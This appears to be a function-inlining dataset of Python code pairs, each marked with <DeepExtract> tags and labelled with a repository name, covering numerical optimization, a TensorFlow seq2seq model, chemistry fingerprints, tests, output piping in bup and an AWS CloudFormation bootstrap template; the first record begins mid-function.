x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
break
search_direction = np.zeros(n)
search_direction[x_bounded == 0] = x_candidate[x_bounded == 0]
x_reduced = x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
x_grad = x_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
gradient_reduced = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
hess_s = model_hessian @ search_direction
hessian_reduced = hess_s
restart_alt_loop = False
for _ in range(max_iter):
raw_reduction = gradient_reduced * x_reduced - x_grad ** 2
if raw_reduction <= 0.0001 * total_reduction ** 2:
restart_alt_loop = False
break
(search_direction, s_norm) = _compute_new_search_direction_and_norm(x_candidate, x_bounded, x_reduced, gradient_candidate, x_grad, raw_reduction)
(x_bounded, index_active_bound, n_fixed_variables, active_bound, bound_on_tangent, free_variable_reached_bound) = _calc_upper_bound_on_tangent(x_candidate, search_direction, x_bounded, lower_bounds, upper_bounds, n_fixed_variables)
if free_variable_reached_bound:
restart_alt_loop = True
break
hess_s = model_hessian @ search_direction
s_hess_s = np.sum(search_direction[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_s = np.sum(x_candidate[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_x = np.sum(x_candidate[x_bounded == 0] * hessian_reduced[x_bounded == 0])
(previous_reduction, next_reduction, max_reduction, tangent, index_angle_greatest_reduction, n_angles) = _calc_greatest_criterion_reduction(bound_on_tangent, s_hess_s, x_hess_s, x_hess_x, x_grad, s_norm)
if index_angle_greatest_reduction == -1:
restart_alt_loop = False
break
if index_angle_greatest_reduction < n_angles - 1:
tangent = _update_tangent(index_angle_greatest_reduction, bound_on_tangent, n_angles, next_reduction, previous_reduction, max_reduction)
cosine = (1.0 - tangent ** 2) / (1.0 + tangent ** 2)
sine = 2.0 * tangent / (1.0 + tangent ** 2)
current_reduction = _calc_new_reduction(tangent, sine, s_hess_s, x_hess_x, x_hess_s, x_grad, s_norm)
if current_reduction <= 0.0:
restart_alt_loop = False
break
(x_candidate, gradient_candidate, x_grad, gradient_reduced, hessian_reduced) = _update_candidate_vectors_and_reduction_alt_step(x_candidate, search_direction, x_bounded, gradient_candidate, cosine, sine, hess_s, hessian_reduced)
total_reduction = total_reduction + current_reduction
if index_active_bound is not None and index_angle_greatest_reduction == n_angles - 1:
n_fixed_variables += 1
x_bounded[index_active_bound] = active_bound
restart_alt_loop = True
break
if current_reduction <= 0.01 * total_reduction:
restart_alt_loop = False
break
continue
if restart_alt_loop:
continue
else:
break
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
x_candidate = x_candidate
else:
x_candidate_new = np.clip(lower_bounds, x_candidate, upper_bounds)
x_candidate_new[x_bounded == -1] = lower_bounds[x_bounded == -1]
x_candidate_new[x_bounded == 1] = upper_bounds[x_bounded == 1]
x_candidate = x_candidate_new
return x_candidate
|
estimagic
|
positive
|
def __init__(self, source_vocab_size, target_vocab_size, buckets, size, num_layers, max_gradient_norm, batch_size, learning_rate, learning_rate_decay_factor, use_lstm=False, num_samples=512, forward_only=False, dtype=tf.float32):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
dtype: the data type to use to store internal variables.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False, dtype=dtype)
self.learning_rate_decay_op = self.learning_rate.assign(self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
output_projection = None
softmax_loss_function = None
if num_samples > 0 and num_samples < self.target_vocab_size:
w_t = tf.get_variable('proj_w', [self.target_vocab_size, size], dtype=dtype)
w = tf.transpose(w_t)
b = tf.get_variable('proj_b', [self.target_vocab_size], dtype=dtype)
output_projection = (w, b)
def sampled_loss(labels, logits):
labels = tf.reshape(labels, [-1, 1])
local_w_t = tf.cast(w_t, tf.float32)
local_b = tf.cast(b, tf.float32)
local_inputs = tf.cast(logits, tf.float32)
return tf.cast(tf.nn.sampled_softmax_loss(weights=local_w_t, biases=local_b, labels=labels, inputs=local_inputs, num_sampled=num_samples, num_classes=self.target_vocab_size), dtype)
softmax_loss_function = sampled_loss
def get_lstm():
cell = tf.contrib.rnn.BasicLSTMCell(size, state_is_tuple=True, reuse=tf.get_variable_scope().reuse)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
def single_cell():
cell = tf.contrib.rnn.GRUCell(size)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
if use_lstm:
def single_cell():
return tf.contrib.rnn.BasicLSTMCell(size)
<DeepExtract>
cell = tf.contrib.rnn.GRUCell(size)
cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
</DeepExtract>
if num_layers > 1:
cell = tf.contrib.rnn.MultiRNNCell([single_cell() for _ in range(num_layers)])
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return seq2seq.embedding_rnn_seq2seq(encoder_inputs, decoder_inputs, cell, num_encoder_symbols=source_vocab_size, num_decoder_symbols=target_vocab_size, embedding_size=size, output_projection=output_projection, feed_previous=do_decode, dtype=dtype)
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]):
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='encoder{0}'.format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='decoder{0}'.format(i)))
self.target_weights.append(tf.placeholder(dtype, shape=[None], name='weight{0}'.format(i)))
targets = [self.decoder_inputs[i + 1] for i in xrange(len(self.decoder_inputs) - 1)]
if forward_only:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True), softmax_loss_function=softmax_loss_function)
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [tf.matmul(output, output_projection[0]) + output_projection[1] for output in self.outputs[b]]
else:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, False), softmax_loss_function=softmax_loss_function)
params = tf.trainable_variables()
if True:
self.gradient_norms = []
self.updates = []
opt = tf.train.GradientDescentOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
(clipped_gradients, norm) = tf.clip_by_global_norm(gradients, max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.global_variables())
|
def __init__(self, source_vocab_size, target_vocab_size, buckets, size, num_layers, max_gradient_norm, batch_size, learning_rate, learning_rate_decay_factor, use_lstm=False, num_samples=512, forward_only=False, dtype=tf.float32):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
dtype: the data type to use to store internal variables.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False, dtype=dtype)
self.learning_rate_decay_op = self.learning_rate.assign(self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
output_projection = None
softmax_loss_function = None
if num_samples > 0 and num_samples < self.target_vocab_size:
w_t = tf.get_variable('proj_w', [self.target_vocab_size, size], dtype=dtype)
w = tf.transpose(w_t)
b = tf.get_variable('proj_b', [self.target_vocab_size], dtype=dtype)
output_projection = (w, b)
def sampled_loss(labels, logits):
labels = tf.reshape(labels, [-1, 1])
local_w_t = tf.cast(w_t, tf.float32)
local_b = tf.cast(b, tf.float32)
local_inputs = tf.cast(logits, tf.float32)
return tf.cast(tf.nn.sampled_softmax_loss(weights=local_w_t, biases=local_b, labels=labels, inputs=local_inputs, num_sampled=num_samples, num_classes=self.target_vocab_size), dtype)
softmax_loss_function = sampled_loss
def get_lstm():
cell = tf.contrib.rnn.BasicLSTMCell(size, state_is_tuple=True, reuse=tf.get_variable_scope().reuse)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
def single_cell():
cell = tf.contrib.rnn.GRUCell(size)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
if use_lstm:
def single_cell():
return tf.contrib.rnn.BasicLSTMCell(size)
cell = tf.contrib.rnn.GRUCell(size)
cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
if num_layers > 1:
cell = tf.contrib.rnn.MultiRNNCell([single_cell() for _ in range(num_layers)])
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return seq2seq.embedding_rnn_seq2seq(encoder_inputs, decoder_inputs, cell, num_encoder_symbols=source_vocab_size, num_decoder_symbols=target_vocab_size, embedding_size=size, output_projection=output_projection, feed_previous=do_decode, dtype=dtype)
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]):
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='encoder{0}'.format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='decoder{0}'.format(i)))
self.target_weights.append(tf.placeholder(dtype, shape=[None], name='weight{0}'.format(i)))
targets = [self.decoder_inputs[i + 1] for i in xrange(len(self.decoder_inputs) - 1)]
if forward_only:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True), softmax_loss_function=softmax_loss_function)
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [tf.matmul(output, output_projection[0]) + output_projection[1] for output in self.outputs[b]]
else:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, False), softmax_loss_function=softmax_loss_function)
params = tf.trainable_variables()
if True:
self.gradient_norms = []
self.updates = []
opt = tf.train.GradientDescentOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
(clipped_gradients, norm) = tf.clip_by_global_norm(gradients, max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.global_variables())
|
DeepAffinity
|
positive
|
def fprints_from_sdf(sdf_file, fprint_params={}, save=False):
"""Generate fingerprints from conformers in an SDF file."""
mol = mol_from_sdf(sdf_file)
<DeepExtract>
fprints_dict = fprints_dict_from_mol(mol, save=save, **fprint_params)
level = fprint_params.get('level', -1)
fprints_list = fprints_from_fprints_dict(fprints_dict, level=level)
fprints_list = fprints_list
</DeepExtract>
return fprints_list
|
def fprints_from_sdf(sdf_file, fprint_params={}, save=False):
"""Generate fingerprints from conformers in an SDF file."""
mol = mol_from_sdf(sdf_file)
fprints_dict = fprints_dict_from_mol(mol, save=save, **fprint_params)
level = fprint_params.get('level', -1)
fprints_list = fprints_from_fprints_dict(fprints_dict, level=level)
fprints_list = fprints_list
return fprints_list
|
e3fp
|
positive
|
def test_convolution():
n_filters = [1, 5, 10]
win_shapes = [(1, 1), (3, 3), (5, 5)]
strides = [(1, 1), (2, 2), (3, 3)]
border_modes = ['valid', 'same', 'full']
confs = itertools.product(batch_sizes, n_channels, img_shapes, n_filters, win_shapes, strides, border_modes)
confs = shuffled(confs)[:100]
for (batch_size, n_channel, img_shape, n_filter, win_shape, stride, border_mode) in confs:
if img_shape[0] < win_shape[0] or img_shape[1] < win_shape[1]:
continue
print('Convolution: batch_size=%i, n_channel=%i, img_shape=%s, n_filter=%i, win_shape=%s, stride=%s, border_mode=%s' % (batch_size, n_channel, str(img_shape), n_filter, str(win_shape), str(stride), border_mode))
x_shape = (batch_size, n_channel) + img_shape
w_shape = (n_filter, n_channel) + win_shape
x = np.random.normal(size=x_shape).astype(ca.float_)
w = np.random.normal(size=w_shape).astype(ca.float_) * 0.0001
b = np.random.normal(size=(1, n_filter, 1, 1)).astype(ca.float_) * 0.0001
layer = dp.Convolution(n_filter, win_shape, weights=w, bias=b, strides=stride, border_mode=border_mode)
layer.setup(x_shape)
<DeepExtract>
pad = padding(win_shape, border_mode)
h = (img_shape[0] + 2 * pad[0] - win_shape[0]) // stride[0] + 1
w = (img_shape[1] + 2 * pad[1] - win_shape[1]) // stride[1] + 1
y_img_shape = (h, w)
</DeepExtract>
assert layer.y_shape(x_shape) == (batch_size, n_filter) + y_img_shape
check_grad(layer, x)
check_params(layer)
|
def test_convolution():
n_filters = [1, 5, 10]
win_shapes = [(1, 1), (3, 3), (5, 5)]
strides = [(1, 1), (2, 2), (3, 3)]
border_modes = ['valid', 'same', 'full']
confs = itertools.product(batch_sizes, n_channels, img_shapes, n_filters, win_shapes, strides, border_modes)
confs = shuffled(confs)[:100]
for (batch_size, n_channel, img_shape, n_filter, win_shape, stride, border_mode) in confs:
if img_shape[0] < win_shape[0] or img_shape[1] < win_shape[1]:
continue
print('Convolution: batch_size=%i, n_channel=%i, img_shape=%s, n_filter=%i, win_shape=%s, stride=%s, border_mode=%s' % (batch_size, n_channel, str(img_shape), n_filter, str(win_shape), str(stride), border_mode))
x_shape = (batch_size, n_channel) + img_shape
w_shape = (n_filter, n_channel) + win_shape
x = np.random.normal(size=x_shape).astype(ca.float_)
w = np.random.normal(size=w_shape).astype(ca.float_) * 0.0001
b = np.random.normal(size=(1, n_filter, 1, 1)).astype(ca.float_) * 0.0001
layer = dp.Convolution(n_filter, win_shape, weights=w, bias=b, strides=stride, border_mode=border_mode)
layer.setup(x_shape)
pad = padding(win_shape, border_mode)
h = (img_shape[0] + 2 * pad[0] - win_shape[0]) // stride[0] + 1
w = (img_shape[1] + 2 * pad[1] - win_shape[1]) // stride[1] + 1
y_img_shape = (h, w)
assert layer.y_shape(x_shape) == (batch_size, n_filter) + y_img_shape
check_grad(layer, x)
check_params(layer)
|
deeppy
|
positive
|
def run_module_cmd(module, args):
if not (fix_stdout or fix_stderr):
<DeepExtract>
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
</DeepExtract>
return
srcs = []
dests = []
real_out_fd = real_err_fd = stdout_pipe = stderr_pipe = None
filter_thread = filter_thread_started = None
pending_ex = None
try:
if fix_stdout:
sys.stdout.flush()
stdout_pipe = os.pipe()
real_out_fd = os.dup(sys.stdout.fileno())
os.dup2(stdout_pipe[1], sys.stdout.fileno())
srcs.append(stdout_pipe[0])
dests.append(real_out_fd)
if fix_stderr:
sys.stderr.flush()
stderr_pipe = os.pipe()
real_err_fd = os.dup(sys.stderr.fileno())
os.dup2(stderr_pipe[1], sys.stderr.fileno())
srcs.append(stderr_pipe[0])
dests.append(real_err_fd)
filter_thread = Thread(name='output filter', target=lambda : filter_output(srcs, dests))
filter_thread.start()
filter_thread_started = True
<DeepExtract>
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
</DeepExtract>
except Exception as ex:
add_ex_tb(ex)
pending_ex = ex
raise
finally:
try:
real_out_fd is not None and os.dup2(real_out_fd, sys.stdout.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
real_err_fd is not None and os.dup2(real_err_fd, sys.stderr.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stdout_pipe is not None and os.close(stdout_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stderr_pipe is not None and os.close(stderr_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
close_catpipes()
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
if pending_ex:
raise pending_ex
if filter_thread_started:
filter_thread.join()
|
def run_module_cmd(module, args):
if not (fix_stdout or fix_stderr):
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
return
srcs = []
dests = []
real_out_fd = real_err_fd = stdout_pipe = stderr_pipe = None
filter_thread = filter_thread_started = None
pending_ex = None
try:
if fix_stdout:
sys.stdout.flush()
stdout_pipe = os.pipe()
real_out_fd = os.dup(sys.stdout.fileno())
os.dup2(stdout_pipe[1], sys.stdout.fileno())
srcs.append(stdout_pipe[0])
dests.append(real_out_fd)
if fix_stderr:
sys.stderr.flush()
stderr_pipe = os.pipe()
real_err_fd = os.dup(sys.stderr.fileno())
os.dup2(stderr_pipe[1], sys.stderr.fileno())
srcs.append(stderr_pipe[0])
dests.append(real_err_fd)
filter_thread = Thread(name='output filter', target=lambda : filter_output(srcs, dests))
filter_thread.start()
filter_thread_started = True
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
except Exception as ex:
add_ex_tb(ex)
pending_ex = ex
raise
finally:
try:
real_out_fd is not None and os.dup2(real_out_fd, sys.stdout.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
real_err_fd is not None and os.dup2(real_err_fd, sys.stderr.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stdout_pipe is not None and os.close(stdout_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stderr_pipe is not None and os.close(stderr_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
close_catpipes()
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
if pending_ex:
raise pending_ex
if filter_thread_started:
filter_thread.join()
|
bup
|
positive
|
def check_template(self):
"""Check if messages in sources and template are the same."""
<DeepExtract>
with open(self.po_template, 'rb') as fh:
catalog = read_po(fh, lang)
messages_old = [m.id for m in catalog][1:]
</DeepExtract>
(_, filepath) = tempfile.mkstemp()
<DeepExtract>
if filepath is None:
filepath = self.po_template
self._run('extract', '-F', self.config, '-o', filepath, '--project', 'CDPedia', '--copyright-holder', 'CDPedistas (see AUTHORS.txt)', self.source_dir)
</DeepExtract>
<DeepExtract>
with open(filepath, 'rb') as fh:
catalog = read_po(fh, lang)
messages_new = [m.id for m in catalog][1:]
</DeepExtract>
os.remove(filepath)
self.source_messages = len(messages_new)
self.template_updated = messages_old == messages_new
logger.info('Messages: %d in sources, %d in template, up to date: %s', len(messages_new), len(messages_old), self.template_updated)
|
def check_template(self):
"""Check if messages in sources and template are the same."""
with open(self.po_template, 'rb') as fh:
catalog = read_po(fh, lang)
messages_old = [m.id for m in catalog][1:]
(_, filepath) = tempfile.mkstemp()
if filepath is None:
filepath = self.po_template
self._run('extract', '-F', self.config, '-o', filepath, '--project', 'CDPedia', '--copyright-holder', 'CDPedistas (see AUTHORS.txt)', self.source_dir)
with open(filepath, 'rb') as fh:
catalog = read_po(fh, lang)
messages_new = [m.id for m in catalog][1:]
os.remove(filepath)
self.source_messages = len(messages_new)
self.template_updated = messages_old == messages_new
logger.info('Messages: %d in sources, %d in template, up to date: %s', len(messages_new), len(messages_old), self.template_updated)
|
CDPedia
|
positive
|
def get_template(puppet_version, all_regions, source, is_caching_enabled, is_manual_approvals: bool, scm_skip_creation_of_repo: bool, should_validate: bool) -> t.Template:
is_codecommit = source.get('Provider', '').lower() == 'codecommit'
is_github = source.get('Provider', '').lower() == 'github'
is_codestarsourceconnection = source.get('Provider', '').lower() == 'codestarsourceconnection'
is_custom = source.get('Provider', '').lower() == 'custom'
is_s3 = source.get('Provider', '').lower() == 's3'
description = f'Bootstrap template used to bring up the main ServiceCatalog-Puppet AWS CodePipeline with dependencies\n{{"version": "{puppet_version}", "framework": "servicecatalog-puppet", "role": "bootstrap-master"}}'
template = t.Template(Description=description)
version_parameter = template.add_parameter(t.Parameter('Version', Default=puppet_version, Type='String'))
org_iam_role_arn_parameter = template.add_parameter(t.Parameter('OrgIamRoleArn', Default='None', Type='String'))
with_manual_approvals_parameter = template.add_parameter(t.Parameter('WithManualApprovals', Type='String', AllowedValues=['Yes', 'No'], Default='No'))
puppet_code_pipeline_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetCodePipelineRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetCodePipelineRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
source_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('SourceRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the SourceRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_generate_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetGenerateRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetGenerateRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_deploy_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetDeployRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_provisioning_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('PuppetProvisioningRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetProvisioningRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
cloud_formation_deploy_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('CloudFormationDeployRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the CloudFormationDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('DeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type', Default='BUILD_GENERAL1_SMALL'))
spoke_deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('SpokeDeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type for spoke execution mode', Default='BUILD_GENERAL1_SMALL'))
deploy_num_workers_parameter = template.add_parameter(t.Parameter('DeployNumWorkers', Type='Number', Description='Number of workers that should be used when running a deploy', Default=10))
puppet_role_name_parameter = template.add_parameter(t.Parameter('PuppetRoleName', Type='String', Default='PuppetRole'))
puppet_role_path_template_parameter = template.add_parameter(t.Parameter('PuppetRolePath', Type='String', Default='/servicecatalog-puppet/'))
template.add_condition('ShouldUseOrgs', t.Not(t.Equals(t.Ref(org_iam_role_arn_parameter), 'None')))
template.add_condition('HasManualApprovals', t.Equals(t.Ref(with_manual_approvals_parameter), 'Yes'))
template.add_resource(s3.Bucket('StacksRepository', BucketName=t.Sub('sc-puppet-stacks-repository-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
log_bucket = template.add_resource(s3.Bucket('LogStore', BucketName=t.Sub('sc-puppet-log-store-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
manual_approvals_param = template.add_resource(ssm.Parameter('ManualApprovalsParam', Type='String', Name='/servicecatalog-puppet/manual-approvals', Value=t.Ref(with_manual_approvals_parameter)))
template.add_resource(ssm.Parameter('SpokeDeployEnvParameter', Type='String', Name=constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME, Value=t.Ref(spoke_deploy_environment_compute_type_parameter)))
param = template.add_resource(ssm.Parameter('Param', Type='String', Name='service-catalog-puppet-version', Value=t.Ref(version_parameter)))
partition_parameter = template.add_resource(ssm.Parameter('PartitionParameter', Type='String', Name='/servicecatalog-puppet/partition', Value=t.Ref('AWS::Partition')))
puppet_role_name_parameter = template.add_resource(ssm.Parameter('PuppetRoleNameParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/name', Value=t.Ref(puppet_role_name_parameter)))
puppet_role_path_parameter = template.add_resource(ssm.Parameter('PuppetRolePathParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/path', Value=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('ShareAcceptFunctionRole', RoleName='ShareAcceptFunctionRole', ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole')], Path=t.Ref(puppet_role_path_template_parameter), Policies=[iam.Policy(PolicyName='ServiceCatalogActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Resource': {'Fn::Sub': 'arn:${AWS::Partition}:iam::*:role${PuppetRolePath}${PuppetRoleName}'}, 'Effect': 'Allow'}]})], AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['lambda.amazonaws.com']}}]}))
template.add_resource(iam.Role('ProvisioningRole', RoleName='PuppetProvisioningRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_provisioning_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('CloudFormationDeployRole', RoleName='CloudFormationDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['cloudformation.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(cloud_formation_deploy_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('PipelineRole', RoleName='PuppetCodePipelineRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_code_pipeline_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('SourceRole', RoleName='PuppetSourceRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(source_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
